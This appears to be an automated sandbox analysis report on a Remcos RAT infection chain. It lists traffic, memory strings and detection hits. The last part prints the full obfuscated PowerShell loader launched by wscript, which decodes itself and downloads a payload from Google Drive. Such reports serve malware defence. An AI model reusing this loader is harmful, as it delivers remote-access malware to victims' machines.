              Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.6:49690 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.6:49697 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.6:49698 version: TLS 1.2
              Source: Binary string: ystem.pdb source: powershell.exe, 00000009.00000002.1510863986.0000013ACCFD2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .pdb.hz source: powershell.exe, 00000009.00000002.1547484456.0000013AE7139000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbh source: powershell.exe, 0000000C.00000002.1954822321.0000000006E60000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: bpdbtem.pdb source: powershell.exe, 00000009.00000002.1510863986.0000013ACCFD2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 00000009.00000002.1547484456.0000013AE711C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb source: powershell.exe, 0000000C.00000002.1954822321.0000000006E60000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Uses ping.exe to check the status of other devices and networks
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I HTTP/1.1Host: drive.google.com
              Source: global trafficHTTP traffic detected: GET /download?id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49697 -> 216.58.212.174:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49689 -> 216.58.212.174:443
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=179yeRSPIWYmvgjVo15SJW1KN3hF-txYZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=179yeRSPIWYmvgjVo15SJW1KN3hF-txYZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I HTTP/1.1Host: drive.google.com
              Source: global trafficHTTP traffic detected: GET /download?id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=179yeRSPIWYmvgjVo15SJW1KN3hF-txYZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=179yeRSPIWYmvgjVo15SJW1KN3hF-txYZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: Host_6637.6637.6637.657e
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: wscript.exe, 00000000.00000002.1292228194.00000256F9C4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1290382371.00000256F9C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: wscript.exe, 00000000.00000003.1281458875.00000256F9CF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1280974955.00000256F9CF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1292228194.00000256F9C4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1290382371.00000256F9C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: wscript.exe, 00000000.00000003.1280974955.00000256F9C96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1281131926.00000256F9CBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1281458875.00000256F9CBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b9ddea84f0e3e
              Source: wscript.exe, 00000000.00000003.1280974955.00000256F9C96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1281131926.00000256F9CBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1281458875.00000256F9CBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b9ddea84f0
              Source: powershell.exe, 0000000C.00000002.1923721123.0000000002881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
              Source: powershell.exe, 0000000C.00000002.1923721123.0000000002881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.ce
              Source: powershell.exe, 00000009.00000002.1540197391.0000013ADEC14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACEDC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACEBA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1926844713.00000000043D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACEDC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACEBA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000C.00000002.1926844713.00000000043D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACF024000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000009.00000002.1540197391.0000013ADEC14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000009.00000002.1540197391.0000013ADEC14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000009.00000002.1540197391.0000013ADEC14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.g
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.go
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goo
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goog
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googl
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.c
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.co
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACEDC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/u
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?e
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?ex
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?exp
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expo
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expor
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=d
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=do
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=dow
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=down
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downl
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downlo
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downloa
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&i
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_M
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1I
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1Ix
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1Ixt
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1Ixtx
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQ
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQa
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaD
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f6
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f65
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f65C
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f65Cn
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0b
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8L
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0X
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACEDC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0IP
              Source: powershell.exe, 0000000C.00000002.1926844713.0000000004527000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0IXR1l
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACF03F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACF03F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF149000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I&export=download
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACEDC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000009.00000002.1540197391.0000013ADEC14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACF024000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACF024000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACF024000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACF024000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACF024000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
              Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
              Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
              Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
              Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.6:49688 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.6:49690 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.6:49697 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.6:49698 version: TLS 1.2

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000010.00000002.2186165556.00000000098DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi64_7424.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_7816.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7424, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7816, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($Naturalization){$Reacquainted129=4;do{$Cozies104+=$Naturalization[$Reacquainted129];$Reacquainted129+=5;$Bemoil=Format-List} until(!$Naturalization[$Reacquainted129])$Cozies104}$Vagttaarnenes=Infractor 'W xbNparaeCentTR ck. Blow';$Vagttaarnenes+=Infractor 'Ba nEPjevbAwakc,arelTobaIBlepESqu NSprot';$Dysbulic=Infractor 'TekrMGroooMindzafpriSirilD bil DigaDa b/';$Altnglerne92=Infractor 'Imp TEthylFremsGrap1Spot2';$Segregerede=' Rig[MaksNNe,oEBechtB.ro.p.gwS k peKam.rIsagvAandiForpC SpeeVaskPSpgeorelai PhoNkompTHumoM.eroa m rnSangA alcG Rele BilRAlop]smre:Kiss: ejssCbfte sivc Su UOpharKar i ongTPen yAgnopHarlr.ariOnecet F.ro.jenCMjesoCollLRime=D.mp$WencaEscalPhostOvernBaneGTolvLScraESaldRU,pfNSgetE Asy9flyw2';$Dysbulic+=Infractor ' fre5S,rg. Car0Opse Resi(SygeW S.ci FlynPseudSpekoM.ljwK lvsUl.i ModuN iceT Unv Barn1Homo0Trib.Biod0Be i;Be t cod,WCar ih llnBefo6Mist4Nonn;Krad FripxF rs6apra4Stan;Rec. MarrArvevClas:Rhod1Ufo 3 Fol4 Opf.Unif0L vs)Ud a SickG erceMasocTrogk,onroGen,/Gono2,igo0K,pi1mass0U.in0 Dal1Fiel0 ata1 Ent B,deFOv,riPar rIne.eOve f oico Mi xSuda/ We 1Knig3Macu4 Sco.Ko t0';$Quillaias180=Infractor 'LocauSlagsBakkE Exirtogd-in dAHjlpgUn,ee He NUnunT';$Aabningstidernes=Infractor ' upmhKeglt .rntLe,sptri s Til: hor/San /OctadKnsfrMik.i sliv Ante U.u. ,legEft oquafoPolyg Prol nae Aut.S,idcCorroJug mOffe/ Re u KatcSpl ? ,loeMe axRi,dpUnd,oSp,rrSaldtLion=Un vdErhvoConcw abnEpiclskovoMissaKunsd Fro&UnsaiAntidOpsu=Aspa1Dep,yIron_Fr gMPennUEndo1.matISammxMelotUmrkx ,uiQUdhuaMoraDU.ign,wee_KundfFi a6Sala5 VicC HornLouv0 T gb FerFSti 8BedlLChlof,isc0.tlnXBuscC I o8AldeUCong0U deI';$Rotationspumperne=Infractor ' Ugi>';$Glassliberes=Infractor 'DormitilieV weX';$Eliquating='Gulvs';$Klatrende='\Udskilleres.Bre';janey (Infractor ',itr$OutcGUnscl KelO ,ncBnoneaResulAad,:,rspiC azN F,lTSpeer .blaOceaVrem E AscnSchcs ill= et$ElkaEWar nE.chvRdbe:NoncaLas.P UndpDiamDNegra FortInadaSylv+Skry$ yrbkarseLSalmAf rgTUnpir AirESc.rNSkrad esE');janey (Infractor ' Erk$PhysgBenzLHemaOArkobLokaaR adlSkul:LudwMS riIGratCCharM OctAStatcSmre=R fu$IngeaAnesa esBLillnSandiplynN mregAgenS A aT uttiCappDFu,dE,forRhollN Unfeu,shS Nay.KerySTriepHer LOgleILdenT ag(ev,j$Popur telO Best GalASo ntAuxiIRegrOPerfn munSTillPSam uAlvemSerpp Ac,eWarprLandN Pg ED,fr)');janey (Infractor $Segregerede);$Aabningstidernes=$Micmac[0];$Bayer=(Infractor 'cler$ ensgSyg.ltrocoUndebBaneAVavaLPluk: indeAlinmchilUA delNonpGSti.eNonfrRedbi outNCafeGpho eU taRT leNBarrECoenSOgr,= ,lbnCompE,ehaWGr n-uncaOinteB QabJScenEOutfCDoubTRen. tabeSReb.yPoleSsup,tOpbeEDy fMExpo.Iv.k$ RapvPlebA igeGPa it ,ipt .leaErgoaClu r ricnHfl EFo bN MelEpa,ls');janey ($Bayer);janey (Infractor 'L.fg$Frafe 